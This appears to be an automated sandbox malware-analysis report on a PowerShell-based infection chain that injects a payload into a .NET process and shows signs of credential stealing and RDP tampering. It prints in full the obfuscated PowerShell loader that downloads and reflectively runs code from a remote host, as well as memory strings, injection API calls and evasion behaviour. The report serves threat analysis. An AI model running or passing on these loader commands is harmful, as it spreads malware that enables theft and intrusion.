              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: AddInProcess32.exeBinary or memory string: PROCESSHACKER.EXE
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: 0.RUDP\ICACLS.EXE\XCOPY.EXE "" /GRANT:R *S-1-1-0:(OI)(CI)F /T\APPDATA\LOCAL\GOOGLE\APPDATA\LOCAL\GOOGLE\XCOPY.EXE /Y /E /C \APPDATA\ROAMING\MOZILLA\APPDATA\ROAMING\MOZILLA\\APPDATA\ROAMING\MICROSOFT\APPDATA\ROAMING\MICROSOFT\\APPDATA\LOCAL\PACKAGES\MICROSOFT.MICROSOFTEDGE_8WEKYB3D8BBWE\APPDATA\LOCAL\PACKAGES\MICROSOFT.MICROSOFTEDGE_8WEKYB3D8BBWE\TERMSERVICE%PROGRAMFILES%%WINDIR%\SYSTEM32%PROGRAMW6432%\MICROSOFT DN1\RFXVMT.DLL\RDPWRAP.INI\SQLMAP.DLLRPDPSOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SPECIALACCOUNTS\USERLISTSEDEBUGPRIVILEGESYSTEM\CURRENTCONTROLSET\SERVICES\TERMSERVICE\PARAMETERSSERVICEDLLSYSTEM\CURRENTCONTROLSET\SERVICES\TERMSERVICEIMAGEPATHSVCHOST.EXESVCHOST.EXE -KCERTPROPSVCSESSIONENVSERVICESACTIVESYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVERSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\LICENSING CORESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGONSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\ADDINSSYSTEM\CURRENTCONTROLSET\CONTROLTERMINAL SERVER\ADDINS\CLIP REDIRECTORSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\ADDINS\DYNAMIC VCFDENYTSCONNECTIONSENABLECONCURRENTSESSIONSALLOWMULTIPLETSSESSIONSRDPCLIPNAMETYPEMULTIRDP[EXPERIMENTAL] PATCH TERMINAL SERVER SERVICE TO ALLOW MULTIPLES USERSTERMSRV.DLLEXPLORER.EXETASKMGR.EXEPROCESSHACKER.EXEREGEDIT.EXENTDLL.DLLLDRGETPROCEDUREADDRESSRTLNTSTATUSTODOSERRORRTLSETLASTWIN32ERRORNTALLOCATEVIRTUALMEMORYNTPROTECTVIRTUALMEMORYNTWRITEVIRTUALMEMORYLDRLOADDLLRTLCREATEUSERTHREAD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEE9F19 sldt word ptr fs:[eax]4_2_00007FF7BFEE9F19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,5_2_0040D8FB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1515Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1656Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4554Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5237Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-67550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 7.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 4554 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep count: 5237 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5872Thread sleep count: 70 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00411446 FindFirstFileW,FindNextFileW,5_2_00411446
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,5_2_0040955B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCCEF35 PR_SetError,_mbsinc,FindFirstFileA,GetLastError,5_2_6CCCEF35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,5_2_0041154A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCCC9B4 GetSystemInfo,5_2_6CCCC9B4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.1442971665.000001B2BAEC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AddInProcess32.exe, 00000005.00000002.2627316202.00000000014E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_5-67702
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,5_2_004060B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00426222 mov eax, dword ptr fs:[00000030h]5_2_00426222
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041EB27 mov eax, dword ptr fs:[00000030h]5_2_0041EB27
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00411B38 mov eax, dword ptr fs:[00000030h]5_2_00411B38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00411B3F mov eax, dword ptr fs:[00000030h]5_2_00411B3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00411E6D mov eax, dword ptr fs:[00000030h]5_2_00411E6D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00406045 GetProcessHeap,RtlAllocateHeap,5_2_00406045
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CD4E2D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6CD4E2D8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,5_2_00407B2E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,5_2_00407D5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,5_2_00413F7F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 417000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41C000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 55B000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 55D000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1159008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe5_2_0041405F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor3ygjypnrhiqjykubmfnrvszldexldjdlupvaw4njykgkcgnzgsnkyc3dscrj3jsiccrjz0gwvneahr0chm6ly9pytywmdewmc51cycrjy5hjysncmnoaxzllm9yzy8yjysnnccrjy8nkydpdgvtcy9kzxqnkydhac0nkydub3rllxyvjysnrgv0ywgnkydojysnb3rlvi50jysnehqnkydzu0qnkyc7zgs3jysnyicrj2fzzscrjzy0q28nkydudgvujysndccrjya9iccrjyhozscrj3cttycrj2jqzscrj2n0iccrj1mnkyd5cycrj3rljysnbs5ozscrj3quv2viqycrj2xpzscrj250ks5eb3dubg8nkydhjysnzfmnkyd0cmlujysnzyhkjysnazd1jysncmwnkycpo2qnkydrjysnn2jpjysnbicrj2fyeunvjysnbicrj3rlbicrj3qgpsankydbu3lzdgunkydtlknvbnzlcnqnkyddoicrjzonkydgcicrj29tqmfzzty0uycrj3ryascrj25nkgqnkydrjysnn2jhcycrj2u2jysnnenvbnrlbicrj3qpo2rrnycrj2fzcycrj2vtjysnymwnkyd5id0nkycgwycrj1inkydlzmxly3qnkydpb24uqxmnkydzjysnzw1ibhldoicrjzpmjysnb2enkydkkgrrn2jpbicrj2fyescrj0nvjysnbnrlbnqpoycrj2rrn3r5jysncccrj2ugpsankydkaycrjzcnkydhcycrj3nljysnbwjses5hzscrj3ruexblkccrj1knkydtrfj1jysnblankydfjysnlkhvbscrj2vzjysnu0qnkycpo2rrn21ldghvzca9jysnigrrnycrj3r5cguujysnrycrj2unkyd0twv0accrj29kkfltrfzbsvltrcknkyc7zgs3bwv0jysnaccrj28nkydklkknkydudm9rzsgnkydkazdujysndwxslccrjybbb2jqjysnzwn0w11djysnqcgnkydzu0qnkyd0ehqujysnzxknkyduby92jysnzwqumniumzlimzqnkyc1mzayytankyc3nwixymmnkycwjysnzdqnkyc1yicrjzyzmicrj2vioscrj2unkydlnjinkyctynunkydwlycrjy86c3b0jysndghzu0qglccrjybzu0qnkydkzxnhdccrj2knkyd2jysnywqnkydvwvmnkydeicwnkycgjysnwvnejysnzccrj2vzyscrj3rpjysndmfkbycrj1knkydtrccrjyasiccrj1ltrgrlc2f0axzhzg9zjysnuycrj0qnkycswscrj1neqwrkjysnsw5qjysncm8nkydjzxnzmycrjzjzu0qswvnewvnejysnksknks5yrvbmyunfkcdkazcnlftzdfjptmddw0noyvjdmzyplnjfuexhq0uoj1ltrccsw3n0umloz11bq2hhul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((gv '*mdr*').name[3,11,2]-join'') (('dk'+'7u'+'rl '+'= ysdhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'detah'+'n'+'otev.t'+'xt'+'ysd'+';dk7'+'b'+'ase'+'64co'+'nten'+'t'+' = '+'(ne'+'w-o'+'bje'+'ct '+'s'+'ys'+'te'+'m.ne'+'t.webc'+'lie'+'nt).downlo'+'a'+'ds'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryco'+'n'+'ten'+'t = '+'[syste'+'m.convert'+']:'+':'+'fr'+'ombase64s'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'r'+'eflect'+'ion.as'+'s'+'embly]:'+':l'+'oa'+'d(dk7bin'+'ary'+'co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.ge'+'ttype('+'y'+'sdru'+'np'+'e'+'.hom'+'ey'+'sd'+');dk7method ='+' dk7'+'type.'+'g'+'e'+'tmeth'+'od(ysdvaiysd)'+';dk7met'+'h'+'o'+'d.i'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'ysd'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thysd ,'+' ysd'+'desat'+'i'+'v'+'ad'+'oys'+'d ,'+' '+'ysd'+'d'+'esa'+'ti'+'vado'+'y'+'sd'+' , '+'ysddesativadoy'+'s'+'d'+',y'+'sdadd'+'inp'+'ro'+'cess3'+'2ysd,ysdysd'+'))').replace('dk7',[string][char]36).replace('ysd',[string][char]39) )"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor3ygjypnrhiqjykubmfnrvszldexldjdlupvaw4njykgkcgnzgsnkyc3dscrj3jsiccrjz0gwvneahr0chm6ly9pytywmdewmc51cycrjy5hjysncmnoaxzllm9yzy8yjysnnccrjy8nkydpdgvtcy9kzxqnkydhac0nkydub3rllxyvjysnrgv0ywgnkydojysnb3rlvi50jysnehqnkydzu0qnkyc7zgs3jysnyicrj2fzzscrjzy0q28nkydudgvujysndccrjya9iccrjyhozscrj3cttycrj2jqzscrj2n0iccrj1mnkyd5cycrj3rljysnbs5ozscrj3quv2viqycrj2xpzscrj250ks5eb3dubg8nkydhjysnzfmnkyd0cmlujysnzyhkjysnazd1jysncmwnkycpo2qnkydrjysnn2jpjysnbicrj2fyeunvjysnbicrj3rlbicrj3qgpsankydbu3lzdgunkydtlknvbnzlcnqnkyddoicrjzonkydgcicrj29tqmfzzty0uycrj3ryascrj25nkgqnkydrjysnn2jhcycrj2u2jysnnenvbnrlbicrj3qpo2rrnycrj2fzcycrj2vtjysnymwnkyd5id0nkycgwycrj1inkydlzmxly3qnkydpb24uqxmnkydzjysnzw1ibhldoicrjzpmjysnb2enkydkkgrrn2jpbicrj2fyescrj0nvjysnbnrlbnqpoycrj2rrn3r5jysncccrj2ugpsankydkaycrjzcnkydhcycrj3nljysnbwjses5hzscrj3ruexblkccrj1knkydtrfj1jysnblankydfjysnlkhvbscrj2vzjysnu0qnkycpo2rrn21ldghvzca9jysnigrrnycrj3r5cguujysnrycrj2unkyd0twv0accrj29kkfltrfzbsvltrcknkyc7zgs3bwv0jysnaccrj28nkydklkknkydudm9rzsgnkydkazdujysndwxslccrjybbb2jqjysnzwn0w11djysnqcgnkydzu0qnkyd0ehqujysnzxknkyduby92jysnzwqumniumzlimzqnkyc1mzayytankyc3nwixymmnkycwjysnzdqnkyc1yicrjzyzmicrj2vioscrj2unkydlnjinkyctynunkydwlycrjy86c3b0jysndghzu0qglccrjybzu0qnkydkzxnhdccrj2knkyd2jysnywqnkydvwvmnkydeicwnkycgjysnwvnejysnzccrj2vzyscrj3rpjysndmfkbycrj1knkydtrccrjyasiccrj1ltrgrlc2f0axzhzg9zjysnuycrj0qnkycswscrj1neqwrkjysnsw5qjysncm8nkydjzxnzmycrjzjzu0qswvnewvnejysnksknks5yrvbmyunfkcdkazcnlftzdfjptmddw0noyvjdmzyplnjfuexhq0uoj1